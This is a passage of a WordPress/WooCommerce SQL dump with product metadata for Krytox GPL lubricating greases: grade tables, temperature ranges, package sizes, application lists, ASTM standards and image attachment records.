INSERT INTO `wp_postmeta` VALUES (6743, 347, '716_default_editor', '<ul>\r\n 	<li>Bearings</li>\r\n 	<li>O-Rings</li>\r\n 	<li>Valves</li>\r\n 	<li>Hinges</li>\r\n 	<li>Handles</li>\r\n 	<li>Moving Parts</li>\r\n 	<li>Seals</li>\r\n 	<li>Connectors</li>\r\n 	<li>Rollers</li>\r\n 	<li>Automotive Interiors</li>\r\n 	<li>Fittings</li>\r\n 	<li>Gearbox</li>\r\n</ul>'); 
INSERT INTO `wp_postmeta` VALUES (6744, 347, '719_default_editor', '<ul>\r\n 	<li>ASTM D2595</li>\r\n 	<li>ASTM D6184</li>\r\n</ul>'); 
INSERT INTO `wp_postmeta` VALUES (6745, 769, '_edit_lock', '1476193444:2'); 
INSERT INTO `wp_postmeta` VALUES (6746, 769, '_edit_last', '2'); 
INSERT INTO `wp_postmeta` VALUES (6747, 769, '_visibility', 'visible'); 
INSERT INTO `wp_postmeta` VALUES (6748, 769, '_stock_status', 'instock'); 
INSERT INTO `wp_postmeta` VALUES (6749, 769, '312_default_editor', '<table>\r\n<tbody>\r\n<tr>\r\n<td width="69">\r\n<p style="text-align: center;"><strong>GPL Standard Grades</strong></p>\r\n</td>\r\n<td style="text-align: center;" width="69"><strong>200</strong></td>\r\n<td style="text-align: center;" width="69"><strong>201</strong></td>\r\n<td style="text-align: center;" width="69"><strong>202</strong></td>\r\n<td style="text-align: center;" width="69"><strong>203</strong>\r\n\r\n<strong>(H-1 Certified)</strong></td>\r\n<td style="text-align: center;" width="69"><strong>204</strong></td>\r\n<td style="text-align: center;" width="69"><strong>205</strong>\r\n\r\n<strong>(H-1 Certified)</strong></td>\r\n<td style="text-align: center;" width="69"><strong>206</strong>\r\n\r\n<strong>(H-1 Certified)</strong></td>\r\n<td style="text-align: center;" width="69"><strong>207</strong></td>\r\n</tr>\r\n<tr>\r\n<td style="text-align: center;" width="69"><strong>GPL Extreme Pressure Grades</strong></td>\r\n<td style="text-align: center;" width="69">210</td>\r\n<td style="text-align: center;" width="69">211</td>\r\n<td style="text-align: center;" width="69">212</td>\r\n<td style="text-align: center;" width="69">-</td>\r\n<td style="text-align: center;" width="69">214</td>\r\n<td style="text-align: center;" width="69">215</td>\r\n<td style="text-align: center;" width="69">216</td>\r\n<td style="text-align: center;" width="69">217</td>\r\n</tr>\r\n<tr>\r\n<td style="text-align: center;" width="69"><strong>GPL Anti-Corrosion Grades</strong></td>\r\n<td style="text-align: center;" width="69">220</td>\r\n<td style="text-align: center;" width="69">221</td>\r\n<td style="text-align: center;" width="69">222</td>\r\n<td style="text-align: center;" width="69">223\r\n\r\n(H-1 Certified)</td>\r\n<td style="text-align: center;" width="69">224</td>\r\n<td style="text-align: center;" width="69">225\r\n\r\n(H-1 Certified)</td>\r\n<td style="text-align: center;" width="69">226\r\n\r\n(H-1 Certified)</td>\r\n<td style="text-align: center;" width="69">227</td>\r\n</tr>\r\n<tr>\r\n<td style="text-align: center;" width="69"><strong>Oil Viscosity Index</strong></td>\r\n<td style="text-align: center;" width="69">-</td>\r\n<td style="text-align: center;" width="69">-</td>\r\n<td style="text-align: center;" width="69">29</td>\r\n<td style="text-align: center;" width="69">92</td>\r\n<td style="text-align: center;" width="69">111</td>\r\n<td style="text-align: center;" width="69">124</td>\r\n<td style="text-align: center;" width="69">134</td>\r\n<td style="text-align: center;" width="69">145</td>\r\n</tr>\r\n<tr>\r\n<td width="69">\r\n<p style="text-align: center;"><strong>Estimated Useful Range</strong></p>\r\n<p style="text-align: center;"><strong>°F</strong></p>\r\n</td>\r\n<td style="text-align: center;" width="69">-94-150</td>\r\n<td style="text-align: center;" width="69">-94-220</td>\r\n<td style="text-align: center;" width="69">-81-270</td>\r\n<td style="text-align: center;" width="69">-76-310</td>\r\n<td style="text-align: center;" width="69">-60-355</td>\r\n<td style="text-align: center;" width="69">-33-400</td>\r\n<td style="text-align: center;" width="69">-33-500</td>\r\n<td style="text-align: center;" width="69">-22-550</td>\r\n</tr>\r\n</tbody>\r\n</table>'); 
INSERT INTO `wp_postmeta` VALUES (6750, 769, '317_default_editor', '<table>\r\n<tbody>\r\n<tr>\r\n<td width="125">Syringe</td>\r\n<td width="125">Tube</td>\r\n<td width="125">Jar</td>\r\n<td width="125">Cartridge</td>\r\n<td width="125">Pail</td>\r\n</tr>\r\n<tr>\r\n<td width="125">0.5 oz.</td>\r\n<td width="125">2 oz.</td>\r\n<td width="125">0.5 kg</td>\r\n<td width="125">0.8 kg</td>\r\n<td width="125">5 kg</td>\r\n</tr>\r\n<tr>\r\n<td width="125">1 oz.</td>\r\n<td width="125">-</td>\r\n<td width="125">1 kg</td>\r\n<td width="125"></td>\r\n<td width="125">7 kg</td>\r\n</tr>\r\n<tr>\r\n<td width="125">2 oz.</td>\r\n<td width="125">8 oz.</td>\r\n<td width="125"></td>\r\n<td width="125"></td>\r\n<td width="125">20 kg</td>\r\n</tr>\r\n</tbody>\r\n</table>'); 
INSERT INTO `wp_postmeta` VALUES (6751, 769, 'wc_productdata_options', 'a:1:{i:0;a:6:{s:11:"_bubble_new";s:0:"";s:12:"_bubble_text";s:0:"";s:17:"_custom_tab_title";s:0:"";s:11:"_custom_tab";s:0:"";s:14:"_product_video";s:0:"";s:19:"_product_video_size";s:0:"";}}'); 
INSERT INTO `wp_postmeta` VALUES (6752, 769, '_downloadable', 'no'); 
INSERT INTO `wp_postmeta` VALUES (6753, 769, '_virtual', 'no'); 
INSERT INTO `wp_postmeta` VALUES (6754, 769, '_purchase_note', ''); 
INSERT INTO `wp_postmeta` VALUES (6755, 769, '_featured', 'no'); 
INSERT INTO `wp_postmeta` VALUES (6756, 769, '_weight', ''); 
INSERT INTO `wp_postmeta` VALUES (6757, 769, '_length', ''); 
INSERT INTO `wp_postmeta` VALUES (6758, 769, '_width', ''); 
INSERT INTO `wp_postmeta` VALUES (6759, 769, '_height', ''); 
INSERT INTO `wp_postmeta` VALUES (6760, 769, '_product_attributes', 'a:0:{}'); 
INSERT INTO `wp_postmeta` VALUES (6761, 769, '_regular_price', ''); 
INSERT INTO `wp_postmeta` VALUES (6762, 769, '_sale_price', ''); 
INSERT INTO `wp_postmeta` VALUES (6763, 769, '_sale_price_dates_from', ''); 
INSERT INTO `wp_postmeta` VALUES (6764, 769, '_sale_price_dates_to', ''); 
INSERT INTO `wp_postmeta` VALUES (6765, 769, '_price', ''); 
INSERT INTO `wp_postmeta` VALUES (6766, 769, '_sold_individually', ''); 
INSERT INTO `wp_postmeta` VALUES (6767, 769, '_manage_stock', 'no'); 
INSERT INTO `wp_postmeta` VALUES (6768, 769, '_backorders', 'no'); 
INSERT INTO `wp_postmeta` VALUES (6769, 769, '_stock', ''); 
INSERT INTO `wp_postmeta` VALUES (6770, 769, '_upsell_ids', 'a:0:{}'); 
INSERT INTO `wp_postmeta` VALUES (6771, 769, '_crosssell_ids', 'a:0:{}'); 
INSERT INTO `wp_postmeta` VALUES (6772, 769, '_product_version', '2.6.4'); 
INSERT INTO `wp_postmeta` VALUES (6773, 769, '_ywtm_hide_description', 'no'); 
INSERT INTO `wp_postmeta` VALUES (6774, 769, '_ywtm_override_description', 'no'); 
INSERT INTO `wp_postmeta` VALUES (6775, 769, '_ywtm_priority_tab_description', '1'); 
INSERT INTO `wp_postmeta` VALUES (6776, 769, '_ywtm_title_tab_description', 'Description'); 
INSERT INTO `wp_postmeta` VALUES (6777, 769, '_ywtm_content_tab_description', 'Krytox GPL 200–207 greases are white buttery greases with\r\nall of the same properties as the Krytox GPL 100–107 oils that\r\nthey are made from, but they are in grease form.\r\n\r\n&nbsp;\r\n\r\n<a href="https://www.miller-stephenson.com/wp-content/uploads/2016/08/GPL-PDF.pdf">GPL PDF</a>'); 
INSERT INTO `wp_postmeta` VALUES (6778, 769, '_ywtm_hide_reviews', 'no'); 
INSERT INTO `wp_postmeta` VALUES (6779, 769, '_ywtm_override_reviews', 'no'); 
INSERT INTO `wp_postmeta` VALUES (6780, 769, '_ywtm_priority_tab_reviews', '30'); 
INSERT INTO `wp_postmeta` VALUES (6781, 769, '_ywtm_title_tab_reviews', 'Reviews (%d)'); 
INSERT INTO `wp_postmeta` VALUES (6782, 769, '_product_image_gallery', '374,378,380,377,375,379,381'); 
INSERT INTO `wp_postmeta` VALUES (6783, 769, '318_custom_list_file', 'a:1:{s:32:"0f56c72f01d489ddf11bd7f17f74f118";a:3:{s:4:"name";s:20:"GPL Comparison Sheet";s:4:"file";s:72:"https://www.miller-stephenson.com/wp-content/uploads/2016/08/GPL-PDF.pdf";s:4:"desc";s:20:"Technical Data Sheet";}}'); 
INSERT INTO `wp_postmeta` VALUES (6785, 769, '716_default_editor', '<ul>\r\n 	<li>Bearings</li>\r\n 	<li>O-Rings</li>\r\n 	<li>Valves</li>\r\n 	<li>Hinges</li>\r\n 	<li>Handles</li>\r\n 	<li>Moving Parts</li>\r\n 	<li>Seals</li>\r\n 	<li>Connectors</li>\r\n 	<li>Rollers</li>\r\n 	<li>Automotive Interiors</li>\r\n 	<li>Fittings</li>\r\n 	<li>Gearbox</li>\r\n</ul>'); 
INSERT INTO `wp_postmeta` VALUES (6786, 769, '719_default_editor', '<ul>\r\n 	<li>ASTM D2595</li>\r\n 	<li>ASTM D6184</li>\r\n</ul>'); 
INSERT INTO `wp_postmeta` VALUES (6810, 771, '_wp_attached_file', '2016/08/shutterstock_117518518.jpg'); 
INSERT INTO `wp_postmeta` VALUES (6811, 771, '_wp_attachment_metadata', 'a:6:{s:5:"width";i:4592;s:6:"height";i:3448;s:4:"file";s:34:"2016/08/shutterstock_117518518.jpg";s:5:"sizes";a:8:{s:9:"thumbnail";a:4:{s:4:"file";s:34:"shutterstock_117518518-340x340.jpg";s:5:"width";i:340;s:6:"height";i:340;s:9:"mime-type";s:10:"image/jpeg";}s:6:"medium";a:4:{s:4:"file";s:34:"shutterstock_117518518-800x601.jpg";s:5:"width";i:800;s:6:"height";i:601;s:9:"mime-type";s:10:"image/jpeg";}s:12:"medium_large";a:4:{s:4:"file";s:34:"shutterstock_117518518-768x577.jpg";s:5:"width";i:768;s:6:"height";i:577;s:9:"mime-type";s:10:"image/jpeg";}s:5:"large";a:4:{s:4:"file";s:36:"shutterstock_117518518-1600x1201.jpg";s:5:"width";i:1600;s:6:"height";i:1201;s:9:"mime-type";s:10:"image/jpeg";}s:25:"display_product_thumbnail";a:4:{s:4:"file";s:34:"shutterstock_117518518-250x250.jpg";s:5:"width";i:250;s:6:"height";i:250;s:9:"mime-type";s:10:"image/jpeg";}s:14:"shop_thumbnail";a:4:{s:4:"file";s:34:"shutterstock_117518518-200x200.jpg";s:5:"width";i:200;s:6:"height";i:200;s:9:"mime-type";s:10:"image/jpeg";}s:12:"shop_catalog";a:4:{s:4:"file";s:34:"shutterstock_117518518-225x225.jpg";s:5:"width";i:225;s:6:"height";i:225;s:9:"mime-type";s:10:"image/jpeg";}s:11:"shop_single";a:4:{s:4:"file";s:34:"shutterstock_117518518-510x600.jpg";s:5:"width";i:510;s:6:"height";i:600;s:9:"mime-type";s:10:"image/jpeg";}}s:10:"image_meta";a:12:{s:8:"aperture";s:1:"0";s:6:"credit";s:0:"";s:6:"camera";s:0:"";s:7:"caption";s:0:"";s:17:"created_timestamp";s:1:"0";s:9:"copyright";s:0:"";s:12:"focal_length";s:1:"0";s:3:"iso";s:1:"0";s:13:"shutter_speed";s:1:"0";s:5:"title";s:0:"";s:11:"orientation";s:1:"0";s:8:"keywords";a:0:{}}s:7:"optimus";a:3:{s:6:"profit";s:1:"4";s:8:"quantity";d:78;s:4:"webp";i:0;}}'); 
INSERT INTO `wp_postmeta` VALUES (6816, 774, '_wp_attached_file', '2016/08/shutterstock_329225291.jpg'); 
INSERT INTO `wp_postmeta` VALUES (6817, 774, '_wp_attachment_metadata', 'a:6:{s:5:"width";i:4000;s:6:"height";i:2667;s:4:"file";s:34:"2016/08/shutterstock_329225291.jpg";s:5:"sizes";a:8:{s:9:"thumbnail";a:4:{s:4:"file";s:34:"shutterstock_329225291-340x340.jpg";s:5:"width";i:340;s:6:"height";i:340;s:9:"mime-type";s:10:"image/jpeg";}s:6:"medium";a:4:{s:4:"file";s:34:"shutterstock_329225291-800x533.jpg";s:5:"width";i:800;s:6:"height";i:533;s:9:"mime-type";s:10:"image/jpeg";}s:12:"medium_large";a:4:{s:4:"file";s:34:"shutterstock_329225291-768x512.jpg";s:5:"width";i:768;s:6:"height";i:512;s:9:"mime-type";s:10:"image/jpeg";}s:5:"large";a:4:{s:4:"file";s:36:"shutterstock_329225291-1600x1067.jpg";s:5:"width";i:1600;s:6:"height";i:1067;s:9:"mime-type";s:10:"image/jpeg";}s:25:"display_product_thumbnail";a:4:{s:4:"file";s:34:"shutterstock_329225291-250x250.jpg";s:5:"width";i:250;s:6:"height";i:250;s:9:"mime-type";s:10:"image/jpeg";}s:14:"shop_thumbnail";a:4:{s:4:"file";s:34:"shutterstock_329225291-200x200.jpg";s:5:"width";i:200;s:6:"height";i:200;s:9:"mime-type";s:10:"image/jpeg";}s:12:"shop_catalog";a:4:{s:4:"file";s:34:"shutterstock_329225291-225x225.jpg";s:5:"width";i:225;s:6:"height";i:225;s:9:"mime-type";s:10:"image/jpeg";}s:11:"shop_single";a:4:{s:4:"file";s:34:"shutterstock_329225291-510x600.jpg";s:5:"width";i:510;s:6:"height";i:600;s:9:"mime-type";s:10:"image/jpeg";}}s:10:"image_meta";a:12:{s:8:"aperture";s:1:"0";s:6:"credit";s:0:"";s:6:"camera";s:0:"";s:7:"caption";s:0:"";s:17:"created_timestamp";s:1:"0";s:9:"copyright";s:0:"";s:12:"focal_length";s:1:"0";s:3:"iso";s:1:"0";s:13:"shutter_speed";s:1:"0";s:5:"title";s:0:"";s:11:"orientation";s:1:"0";s:8:"keywords";a:0:{}}s:7:"optimus";a:3:{s:6:"profit";s:1:"2";s:8:"quantity";d:78;s:4:"webp";i:0;}}'); 
INSERT INTO `wp_postmeta` VALUES (6818, 775, '_wp_attached_file', '2016/08/shutterstock_333727961.jpg'); 
INSERT INTO `wp_postmeta` VALUES (6819, 775, '_wp_attachment_metadata', 'a:6:{s:5:"width";i:4256;s:6:"height";i:2832;s:4:"file";s:34:"2016/08/shutterstock_333727961.jpg";s:5:"sizes";a:8:{s:9:"thumbnail";a:4:{s:4:"file";s:34:"shutterstock_333727961-340x340.jpg";s:5:"width";i:340;s:6:"height";i:340;s:9:"mime-type";s:10:"image/jpeg";}s:6:"medium";a:4:{s:4:"file";s:34:"shutterstock_333727961-800x532.jpg";s:5:"width";i:800;s:6:"height";i:532;s:9:"mime-type";s:10:"image/jpeg";}s:12:"medium_large";a:4:{s:4:"file";s:34:"shutterstock_333727961-768x511.jpg";s:5:"width";i:768;s:6:"height";i:511;s:9:"mime-type";s:10:"image/jpeg";}s:5:"large";a:4:{s:4:"file";s:36:"shutterstock_333727961-1600x1065.jpg";s:5:"width";i:1600;s:6:"height";i:1065;s:9:"mime-type";s:10:"image/jpeg";}s:25:"display_product_thumbnail";a:4:{s:4:"file";s:34:"shutterstock_333727961-250x250.jpg";s:5:"width";i:250;s:6:"height";i:250;s:9:"mime-type";s:10:"image/jpeg";}s:14:"shop_thumbnail";a:4:{s:4:"file";s:34:"shutterstock_333727961-200x200.jpg";s:5:"width";i:200;s:6:"height";i:200;s:9:"mime-type";s:10:"image/jpeg";}s:12:"shop_catalog";a:4:{s:4:"file";s:34:"shutterstock_333727961-225x225.jpg";s:5:"width";i:225;s:6:"height";i:225;s:9:"mime-type";s:10:"image/jpeg";}s:11:"shop_single";a:4:{s:4:"file";s:34:"shutterstock_333727961-510x600.jpg";s:5:"width";i:510;s:6:"height";i:600;s:9:"mime-type";s:10:"image/jpeg";}}s:10:"image_meta";a:12:{s:8:"aperture";s:1:"0";s:6:"credit";s:0:"";s:6:"camera";s:0:"";s:7:"caption";s:0:"";s:17:"created_timestamp";s:1:"0";s:9:"copyright";s:0:"";s:12:"focal_length";s:1:"0";s:3:"iso";s:1:"0";s:13:"shutter_speed";s:1:"0";s:5:"title";s:0:"";s:11:"orientation";s:1:"0";s:8:"keywords";a:0:{}}s:7:"optimus";a:3:{s:6:"profit";s:1:"2";s:8:"quantity";d:78;s:4:"webp";i:0;}}'); 
INSERT INTO `wp_postmeta` VALUES (6824, 778, '_wp_attached_file', '2016/08/shutterstock_399075487.jpg'); 
INSERT INTO `wp_postmeta` VALUES (6825, 778, '_wp_attachment_metadata', 'a:6:{s:5:"width";i:3884;s:6:"height";i:2832;s:4:"file";s:34:"2016/08/shutterstock_399075487.jpg";s:5:"sizes";a:8:{s:9:"thumbnail";a:4:{s:4:"file";s:34:"shutterstock_399075487-340x340.jpg";s:5:"width";i:340;s:6:"height";i:340;s:9:"mime-type";s:10:"image/jpeg";}s:6:"medium";a:4:{s:4:"file";s:34:"shutterstock_399075487-800x583.jpg";s:5:"width";i:800;s:6:"height";i:583;s:9:"mime-type";s:10:"image/jpeg";}s:12:"medium_large";a:4:{s:4:"file";s:34:"shutterstock_399075487-768x560.jpg";s:5:"width";i:768;s:6:"height";i:560;s:9:"mime-type";s:10:"image/jpeg";}s:5:"large";a:4:{s:4:"file";s:36:"shutterstock_399075487-1600x1167.jpg";s:5:"width";i:1600;s:6:"height";i:1167;s:9:"mime-type";s:10:"image/jpeg";}s:25:"display_product_thumbnail";a:4:{s:4:"file";s:34:"shutterstock_399075487-250x250.jpg";s:5:"width";i:250;s:6:"height";i:250;s:9:"mime-type";s:10:"image/jpeg";}s:14:"shop_thumbnail";a:4:{s:4:"file";s:34:"shutterstock_399075487-200x200.jpg";s:5:"width";i:200;s:6:"height";i:200;s:9:"mime-type";s:10:"image/jpeg";}s:12:"shop_catalog";a:4:{s:4:"file";s:34:"shutterstock_399075487-225x225.jpg";s:5:"width";i:225;s:6:"height";i:225;s:9:"mime-type";s:10:"image/jpeg";}s:11:"shop_single";a:4:{s:4:"file";s:34:"shutterstock_399075487-510x600.jpg";s:5:"width";i:510;s:6:"height";i:600;s:9:"mime-type";s:10:"image/jpeg";}}s:10:"image_meta";a:12:{s:8:"aperture";s:1:"0";s:6:"credit";s:0:"";s:6:"camera";s:0:"";s:7:"caption";s:0:"";s:17:"created_timestamp";s:1:"0";s:9:"copyright";s:0:"";s:12:"focal_length";s:1:"0";s:3:"iso";s:1:"0";s:13:"shutter_speed";s:1:"0";s:5:"title";s:0:"";s:11:"orientation";s:1:"0";s:8:"keywords";a:0:{}}s:7:"optimus";a:3:{s:6:"profit";s:1:"2";s:8:"quantity";d:78;s:4:"webp";i:0;}}'); 
INSERT INTO `wp_postmeta` VALUES (6831, 769, 'total_sales', '0'); 
INSERT INTO `wp_postmeta` VALUES (6832, 769, '_sku', ''); 
INSERT INTO `wp_postmeta` VALUES (6834, 769, '_thumbnail_id', '771'); 
INSERT INTO `wp_postmeta` VALUES (6835, 783, '_edit_lock', '1476114451:2'); 
INSERT INTO `wp_postmeta` VALUES (6836, 783, '_edit_last', '2'); 
INSERT INTO `wp_postmeta` VALUES (6837, 783, '_visibility', 'visible'); 
INSERT INTO `wp_postmeta` VALUES (6838, 783, '_stock_status', 'instock'); 
INSERT INTO `wp_postmeta` VALUES (6839, 783, '312_default_editor', '<table>\r\n<tbody>\r\n<tr>\r\n<td width="69">\r\n<p style="text-align: center;"><strong>GPL Standard Grades</strong></p>\r\n</td>\r\n<td style="text-align: center;" width="69"><strong>200</strong></td>\r\n<td style="text-align: center;" width="69"><strong>201</strong></td>\r\n<td style="text-align: center;" width="69"><strong>202</strong></td>\r\n<td style="text-align: center;" width="69"><strong>203</strong>\r\n\r\n<strong>(H-1 Certified)</strong></td>\r\n<td style="text-align: center;" width="69"><strong>204</strong></td>\r\n<td style="text-align: center;" width="69"><strong>205</strong>\r\n\r\n<strong>(H-1 Certified)</strong></td>\r\n<td style="text-align: center;" width="69"><strong>206</strong>\r\n\r\n<strong>(H-1 Certified)</strong></td>\r\n<td style="text-align: center;" width="69"><strong>207</strong></td>\r\n</tr>\r\n<tr>\r\n<td style="text-align: center;" width="69"><strong>GPL Extreme Pressure Grades</strong></td>\r\n<td style="text-align: center;" width="69">210</td>\r\n<td style="text-align: center;" width="69">211</td>\r\n<td style="text-align: center;" width="69">212</td>\r\n<td style="text-align: center;" width="69">-</td>\r\n<td style="text-align: center;" width="69">214</td>\r\n<td style="text-align: center;" width="69">215</td>\r\n<td style="text-align: center;" width="69">216</td>\r\n<td style="text-align: center;" width="69">217</td>\r\n</tr>\r\n<tr>\r\n<td style="text-align: center;" width="69"><strong>GPL Anti-Corrosion Grades</strong></td>\r\n<td style="text-align: center;" width="69">220</td>\r\n<td style="text-align: center;" width="69">221</td>\r\n<td style="text-align: center;" width="69">222</td>\r\n<td style="text-align: center;" width="69">223\r\n\r\n(H-1 Certified)</td>\r\n<td style="text-align: center;" width="69">224</td>\r\n<td style="text-align: center;" width="69">225\r\n\r\n(H-1 Certified)</td>\r\n<td style="text-align: center;" width="69">226\r\n\r\n(H-1 Certified)</td>\r\n<td style="text-align: center;" width="69">227</td>\r\n</tr>\r\n<tr>\r\n<td style="text-align: center;" width="69"><strong>Oil Viscosity Index</strong></td>\r\n<td style="text-align: center;" width="69">-</td>\r\n<td style="text-align: center;" width="69">-</td>\r\n<td style="text-align: center;" width="69">29</td>\r\n<td style="text-align: center;" width="69">92</td>\r\n<td style="text-align: center;" width="69">111</td>\r\n<td style="text-align: center;" width="69">124</td>\r\n<td style="text-align: center;" width="69">134</td>\r\n<td style="text-align: center;" width="69">145</td>\r\n</tr>\r\n<tr>\r\n<td width="69">\r\n<p style="text-align: center;"><strong>Estimated Useful Range</strong></p>\r\n<p style="text-align: center;"><strong>°F</strong></p>\r\n</td>\r\n<td style="text-align: center;" width="69">-94-150</td>\r\n<td style="text-align: center;" width="69">-94-220</td>\r\n<td style="text-align: center;" width="69">-81-270</td>\r\n<td style="text-align: center;" width="69">-76-310</td>\r\n<td style="text-align: center;" width="69">-60-355</td>\r\n<td style="text-align: center;" width="69">-33-400</td>\r\n<td style="text-align: center;" width="69">-33-500</td>\r\n<td style="text-align: center;" width="69">-22-550</td>\r\n</tr>\r\n</tbody>\r\n</table>'); 
INSERT INTO `wp_postmeta` VALUES (6840, 783, '317_default_editor', '<table>\r\n<tbody>\r\n<tr>\r\n<td width="125">Syringe</td>\r\n<td width="125">Tube</td>\r\n<td width="125">Jar</td>\r\n<td width="125">Cartridge</td>\r\n<td width="125">Pail</td>\r\n</tr>\r\n<tr>\r\n<td width="125">0.5 oz.</td>\r\n<td width="125">2 oz.</td>\r\n<td width="125">0.5 kg</td>\r\n<td width="125">0.8 kg</td>\r\n<td width="125">5 kg</td>\r\n</tr>\r\n<tr>\r\n<td width="125">1 oz.</td>\r\n<td width="125">-</td>\r\n<td width="125">1 kg</td>\r\n<td width="125"></td>\r\n<td width="125">7 kg</td>\r\n</tr>\r\n<tr>\r\n<td width="125">2 oz.</td>\r\n<td width="125">8 oz.</td>\r\n<td width="125"></td>\r\n<td width="125"></td>\r\n<td width="125">20 kg</td>\r\n</tr>\r\n</tbody>\r\n</table>'); 
INSERT INTO `wp_postmeta` VALUES (6841, 783, 'wc_productdata_options', 'a:1:{i:0;a:6:{s:11:"_bubble_new";s:0:"";s:12:"_bubble_text";s:0:"";s:17:"_custom_tab_title";s:0:"";s:11:"_custom_tab";s:0:"";s:14:"_product_video";s:0:"";s:19:"_product_video_size";s:0:"";}}'); 
INSERT INTO `wp_postmeta` VALUES (6842, 783, '_downloadable', 'no'); 
INSERT INTO `wp_postmeta` VALUES (6843, 783, '_virtual', 'no'); 
INSERT INTO `wp_postmeta` VALUES (6844, 783, '_purchase_note', ''); 
INSERT INTO `wp_postmeta` VALUES (6845, 783, '_featured', 'no'); 
INSERT INTO `wp_postmeta` VALUES (6846, 783, '_weight', ''); 
INSERT INTO `wp_postmeta` VALUES (6847, 783, '_length', ''); 
INSERT INTO `wp_postmeta` VALUES (6848, 783, '_width', ''); 
INSERT INTO `wp_postmeta` VALUES (6849, 783, '_height', ''); 
INSERT INTO `wp_postmeta` VALUES (6850, 783, '_product_attributes', 'a:0:{}'); 
INSERT INTO `wp_postmeta` VALUES (6851, 783, '_regular_price', ''); 
INSERT INTO `wp_postmeta` VALUES (6852, 783, '_sale_price', ''); 
INSERT INTO `wp_postmeta` VALUES (6853, 783, '_sale_price_dates_from', ''); 
INSERT INTO `wp_postmeta` VALUES (6854, 783, '_sale_price_dates_to', ''); 
INSERT INTO `wp_postmeta` VALUES (6855, 783, '_price', ''); 
INSERT INTO `wp_postmeta` VALUES (6856, 783, '_sold_individually', ''); 
INSERT INTO `wp_postmeta` VALUES (6857, 783, '_manage_stock', 'no'); 
INSERT INTO `wp_postmeta` VALUES (6858, 783, '_backorders', 'no'); 
INSERT INTO `wp_postmeta` VALUES (6859, 783, '_stock', ''); 
INSERT INTO `wp_postmeta` VALUES (6860, 783, '_upsell_ids', 'a:0:{}'); 
INSERT INTO `wp_postmeta` VALUES (6861, 783, '_crosssell_ids', 'a:0:{}'); 
INSERT INTO `wp_postmeta` VALUES (6862, 783, '_product_version', '2.6.4'); 
INSERT INTO `wp_postmeta` VALUES (6863, 783, '_ywtm_hide_description', 'no'); 
INSERT INTO `wp_postmeta` VALUES (6864, 783, '_ywtm_override_description', 'no'); 
INSERT INTO `wp_postmeta` VALUES (6865, 783, '_ywtm_priority_tab_description', '1'); 
INSERT INTO `wp_postmeta` VALUES (6866, 783, '_ywtm_title_tab_description', 'Description'); 
INSERT INTO `wp_postmeta` VALUES (6867, 783, '_ywtm_content_tab_description', 'Krytox GPL 200–207 greases are white buttery greases with\r\nall of the same properties as the Krytox GPL 100–107 oils that\r\nthey are made from, but they are in grease form.\r\n\r\n&nbsp;\r\n\r\n<a href="https://www.miller-stephenson.com/wp-content/uploads/2016/08/GPL-PDF.pdf">GPL PDF</a>'); 
INSERT INTO `wp_postmeta` VALUES (6868, 783, '_ywtm_hide_reviews', 'no'); 
INSERT INTO `wp_postmeta` VALUES (6869, 783, '_ywtm_override_reviews', 'no'); 
INSERT INTO `wp_postmeta` VALUES (6870, 783, '_ywtm_priority_tab_reviews', '30'); 
INSERT INTO `wp_postmeta` VALUES (6871, 783, '_ywtm_title_tab_reviews', 'Reviews (%d)'); 
INSERT INTO `wp_postmeta` VALUES (6872, 783, '_product_image_gallery', '374,378,380,377,375,379,381'); 
INSERT INTO `wp_postmeta` VALUES (6873, 783, '318_custom_list_file', 'a:1:{s:32:"0f56c72f01d489ddf11bd7f17f74f118";a:3:{s:4:"name";s:20:"GPL Comparison Sheet";s:4:"file";s:72:"https://www.miller-stephenson.com/wp-content/uploads/2016/08/GPL-PDF.pdf";s:4:"desc";s:20:"Technical Data Sheet";}}'); 
INSERT INTO `wp_postmeta` VALUES (6874, 783, '716_default_editor', '<ul>\r\n 	<li>Bearings</li>\r\n 	<li>O-Rings</li>\r\n 	<li>Valves</li>\r\n 	<li>Hinges</li>\r\n 	<li>Handles</li>\r\n 	<li>Moving Parts</li>\r\n 	<li>Seals</li>\r\n 	<li>Connectors</li>\r\n 	<li>Rollers</li>\r\n 	<li>Automotive Interiors</li>\r\n 	<li>Fittings</li>\r\n 	<li>Gearbox</li>\r\n</ul>'); 
INSERT INTO `wp_postmeta` VALUES (6875, 783, '719_default_editor', '<ul>\r\n 	<li>ASTM D2595</li>\r\n 	<li>ASTM D6184</li>\r\n</ul>'); 
INSERT INTO `wp_postmeta` VALUES (6898, 783, '_thumbnail_id', '775'); 
INSERT INTO `wp_postmeta` VALUES (6899, 783, 'total_sales', '0'); 
INSERT INTO `wp_postmeta` VALUES (6900, 783, '_sku', ''); 
INSERT INTO `wp_postmeta` VALUES (6901, 784, '_edit_lock', '1476114188:2'); 
INSERT INTO `wp_postmeta` VALUES (6902, 784, '_edit_last', '2'); 
INSERT INTO `wp_postmeta` VALUES (6903, 784, '_visibility', 'visible'); 
INSERT INTO `wp_postmeta` VALUES (6904, 784, '_stock_status', 'instock'); 
INSERT INTO `wp_postmeta` VALUES (6905, 784, '312_default_editor', '<table>\r\n<tbody>\r\n<tr>\r\n<td width="69">\r\n<p style="text-align: center;"><strong>GPL Standard Grades</strong></p>\r\n</td>\r\n<td style="text-align: center;" width="69"><strong>200</strong></td>\r\n<td style="text-align: center;" width="69"><strong>201</strong></td>\r\n<td style="text-align: center;" width="69"><strong>202</strong></td>\r\n<td style="text-align: center;" width="69"><strong>203</strong>\r\n\r\n<strong>(H-1 Certified)</strong></td>\r\n<td style="text-align: center;" width="69"><strong>204</strong></td>\r\n<td style="text-align: center;" width="69"><strong>205</strong>\r\n\r\n<strong>(H-1 Certified)</strong></td>\r\n<td style="text-align: center;" width="69"><strong>206</strong>\r\n\r\n<strong>(H-1 Certified)</strong></td>\r\n<td style="text-align: center;" width="69"><strong>207</strong></td>\r\n</tr>\r\n<tr>\r\n<td style="text-align: center;" width="69"><strong>GPL Extreme Pressure Grades</strong></td>\r\n<td style="text-align: center;" width="69">210</td>\r\n<td style="text-align: center;" width="69">211</td>\r\n<td style="text-align: center;" width="69">212</td>\r\n<td style="text-align: center;" width="69">-</td>\r\n<td style="text-align: center;" width="69">214</td>\r\n<td style="text-align: center;" width="69">215</td>\r\n<td style="text-align: center;" width="69">216</td>\r\n<td style="text-align: center;" width="69">217</td>\r\n</tr>\r\n<tr>\r\n<td style="text-align: center;" width="69"><strong>GPL Anti-Corrosion Grades</strong></td>\r\n<td style="text-align: center;" width="69">220</td>\r\n<td style="text-align: center;" width="69">221</td>\r\n<td style="text-align: center;" width="69">222</td>\r\n<td style="text-align: center;" width="69">223\r\n\r\n(H-1 Certified)</td>\r\n<td style="text-align: center;" width="69">224</td>\r\n<td style="text-align: center;" 